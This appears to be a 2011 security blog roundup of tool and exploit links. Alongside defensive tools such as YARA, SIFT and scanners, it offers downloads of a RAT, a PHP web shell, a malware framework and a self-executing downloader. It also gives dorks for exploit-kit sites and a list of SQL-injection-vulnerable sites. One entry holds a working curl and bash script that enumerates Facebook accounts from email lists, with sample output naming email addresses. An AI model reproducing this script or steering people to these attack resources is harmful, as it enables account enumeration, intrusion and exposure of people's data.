Tuesday, 9. August 2011
Schwarze Sonne RAT 2.0 Alpha 2
Schwarze Sonne RAT (Remote Administration Tool) is software designed to control, in the best conditions and comfort possible, any version of Microsoft Windows up to Windows 7.

Download
https://code.google.com/p/schwarzesonenrat/downloads/list



YARA v1.6
YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic. Let's see an example:

Download
http://code.google.com/p/yara-project/downloads/list



Moshi Moshi - VoIP bot - Python
Moshi Moshi is a VoIP Bot written in Python that uses SIP as VoIP Protocol, Text-to-speech engines for Output, and DTMF Tones for Input. It is part of a talk ("Sounds Like Botnet") given at DEF CON 19 and BSidesLV 2011 on VoIP Botnets by Itzik Kotler and Iftach (Ian) Amit.

Download
http://code.google.com/p/moshimoshi/downloads/detail?name=moshimoshi_poc.tar.gz&can=2&q=



SANS Investigative Forensic Toolkit (SIFT) Workstation v.2.1
An international team of forensics experts, led by SANS Faculty Fellow Rob Lee, created the SANS Investigative Forensic Toolkit (SIFT) Workstation and made it available to the whole community as a public service. The free SIFT toolkit, which can match any modern forensic tool suite, is also featured in SANS' Advanced Computer Forensic Analysis and Incident Response course (FOR 508). It demonstrates that advanced investigations and responding to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.

The SIFT Workstation is a VMware appliance, pre-configured with the necessary tools to perform detailed digital forensic examination in a variety of settings. It is compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The brand new version has been completely rebuilt on an Ubuntu base with many new capabilities and tools such as log2timeline that provides a timeline that can be of enormous value to investigators.

Download
http://computer-forensics.sans.org/community/downloads



Wfuzz v.2.0 - Linux
Wfuzz is a tool designed for bruteforcing web applications. It can be used for finding unlinked resources (directories, servlets, scripts, etc.), bruteforcing GET and POST parameters to check for different kinds of injection (SQL, XSS, LDAP, etc.), bruteforcing form parameters (user/password), fuzzing, etc.


Download
http://code.google.com/p/wfuzz/downloads/list



Thursday, 4. August 2011
Analysis of black hat hackers
This paper aims to give an overall up-to-date review, evaluation and analysis of the underground scene of black hat hackers and/or cyber criminals.

Source PDF
http://www.exploit-db.com/download_pdf/17334/



Winners of the Pwnie Award
The winners of the Pwnie Awards were announced at a ceremony in Las Vegas on Aug 3rd, 2011.

Source
http://pwnies.com/winners/



Agnitio Security Code Review
A tool to help developers and security professionals conduct manual security code reviews in a consistent and repeatable way. Agnitio aims to replace the ad hoc nature of manual security code review documentation and to create an audit trail and reporting.

Download
http://sourceforge.net/projects/agnitiotool/files/



Microsoft BlueHat Security contest - $250,000
Microsoft today launched a $250,000 contest for researchers who develop defensive security technologies that deal with entire classes of exploits. The total cash awards for Microsoft's "BlueHat Prize" contest easily dwarfs any bug bounty that's been given by rivals. The company announced the contest as this year's Black Hat security conference got under way today in Las Vegas.

More Details here
https://www.microsoft.com/security/bluehatprize/

see rules and regulations
https://www.microsoft.com/security/bluehatprize/rules.aspx



Mini PHP Shell 27.9 V2
Features: Encoder, Processes, FTP-Brute-Forcer, Server-Information, SQL-Manager, etc.
Download
http://www.megaupload.com/?d=DRHS3AV9



The Social-Engineer Toolkit
The Social Engineering Toolkit (SET) is a Python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Download
http://www.secmaniac.com/download/


The Social-Engineer Toolkit v3.0 Codename "#WeThrowBaseballs" from David Kennedy on Vimeo.



JD-GUI - Java Decompiler
JD-GUI is a standalone graphical utility that displays the Java source code of “.class” files. You can browse the reconstructed source code with JD-GUI for instant access to methods and fields. JD-GUI is free for non-commercial use. This means that JD-GUI shall not be included or embedded into commercial software products. Nevertheless, this project may be freely used for personal needs in commercial or non-commercial environments.

Download
http://java.decompiler.free.fr/jd-gui/downloads/jd-gui-0.3.3.windows.zip
http://java.decompiler.free.fr/jd-gui/downloads/jd-gui-0.3.3.linux.i686.tar.gz



CAT v.1
CAT provides the ability to test a web application for all types of vulnerabilities from SQL injection to reverse proxy bypass. It allows for traffic between a web browser and a web server to be intercepted and altered. Requests can then be repeated within CAT allowing for all aspects of the request to be altered. Requests can be fuzzed using a range of different fuzzing algorithms including brute forcing, injection attacks and scripted attacks; it also provides a facility to fuzz forms with CSRF tokens. Authorisation within an application can easily be checked using two synchronised web sessions from one user type to another.

Download
http://www.contextis.com/resources/tools/cat/download/



malware analysis - eset.com PDF
Download PDF
http://www.eset.com/us/resources/white-papers/Hodprot-Report.pdf



Wednesday, 3. August 2011
Script Deobfuscation Tools
Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. Useful programs for use in exploring malicious pages:

* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/



nSpaces
nSpaces: Multiple virtual Desktops With Password Protection and easy switch
Features of nSpaces

Launch Desktops: Create multiple desktops on your computer.
Launch Apps: Open different applications on each separate virtual desktops to improve your productivity.
Name your space: label your tag for each virtual desktop, the tag is shown on the space switcher.
Change wallpaper: Your desktop is unique, Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.
Color your space: If you don’t like to set a custom image for each desktop, just set a background color for them.
Protect your space: If you don’t like anonymous users to use your spaces, just set a password for them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you create, plus a hotkey for the space switcher. You can change whatever you want.
nSpaces is easy to use, with a simple, menu-driven GUI. It is fast to configure, change, and save.

Download
http://www.bytesignals.com/binary/nspaces/setup.exe



Websitedefender
Features of WebsiteDefender

Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security

Click here to register or know more on WebsiteDefender.
https://dashboard.websitedefender.com/register-for-free-website-scan.php



Hexinject - Linux
These are the current features of Hexinject:

Hexadecimal and raw data injection on the net
Sniff data in hexadecimal or raw format from the net
Data can be piped and easily manipulated
Raw network access cmdline framework
Automatically set the correct checksum (IP, TCP, UDP, ICMP)
Automatically set the correct packet length (IP, TCP, UDP, ICMP)

Download
http://sourceforge.net/projects/hexinject/files/



WordPress image utility - PHP Upload
The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.

Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/



Android Trojan records phone calls - Android
A Trojan spying on your conversations

Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx



Practical C++ Decompilation
C++ decompilation: how to handle it in IDA and the Hex-Rays decompiler. You can get the slides here:
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
and download the recorded talk here:
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation



Best Pack exploit kit
The new injection URL is 1see[dot]ir/j/, currently leading to a Best Pack exploit kit.

Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/



Facebook password recovery
Step by step:

- Go to http://m.facebook.com

- Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- Try using a real email address and try to use a fake email address;
you will see two different behaviors.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0, passing an email address through
the "ep" variable.

Using cURL:

curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done

#+----- EOF ------+


You can enumerate users by using a list of email addresses or phone numbers.

$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO

by
Zerial



Tuesday, 2. August 2011
12,000 sqli vulnerable sites
Source
http://pastebin.com/GYNVsR1W

by
The Snake



Web Application Scanners
A Comparison of 60 Commercial & Open Source Black Box Web Application Vulnerability Scanners.

By Shay Chen
Security Consultant, Researcher & Instructor
http://sectooladdict.blogspot.com/
sectooladdict-$at$-gmail-$dot$-com
August 2011
Assessment Environments: WAVSEP 1.0 / WAVSEP 1.0.3 (http://code.google.com/p/wavsep/)



"google" spyeye-blackhole exploit kit
As per Google search results, it looks like 160,000 sites have been compromised recently (Spyeye & Black hole Exploit kit).

Dork:
exero.eu/catalog/jquery.js



Released Watcher v.1.5.3
Web security testing tool and passive vulnerability scanner

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Download
http://websecuritytool.codeplex.com/releases/view/22212



HexorBase v.1.0
HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even Metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

Download
http://code.google.com/p/hexorbase/downloads/list



Metasploit 4.0
"It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's flexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions."

Download

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-mini.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-full.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-mini.run

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run

http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2

Metasploit 4.0 And Armitage - What's New?



Anonware malware framework - C#
Source
http://pastebin.com/MFc4SY3S

download complete everything @
http://www.megaupload.com/?d=QKMY6HRW
UPDATE: GITHUB REPO AVAILABLE NOW! https://github.com/opendeveloper/anonware (^)_(^)



Black Hat 2011
LAS VEGAS — The 2011 Black Hat security conference is promising a smorgasbord of (in)security fun. From vulnerabilities in PLCs (programmable logic controllers) to the security design of Apple’s iOS and potential hacker attacks on medical implant devices, the range of presentations this year could be the best ever.

Here’s a list of this year’s can’t-miss presentations:
http://www.zdnet.com/blog/security/black-hat-10-cant-miss-hacks-and-presentations/9132



Sunday, 31. July 2011
Downloader - Visual Basic
Convert the EXE file to Base64 and upload it to a website. The downloader downloads it and saves it as a text file. The downloader will then convert the Base64 text to binary, save it as an executable, and then execute it.


Download base64:
http://download.cnet.com/Base64-De-Encoder/3000-2247_4-10571789.html



Cross Site Scripting "XSS" - Dokumentation, Analyse & Techniken "German"
Download PDF
http://www.vulnerability-lab.com/resources/documents/198.pdf



Skype (VoIP) - Denial of Service "DOS"
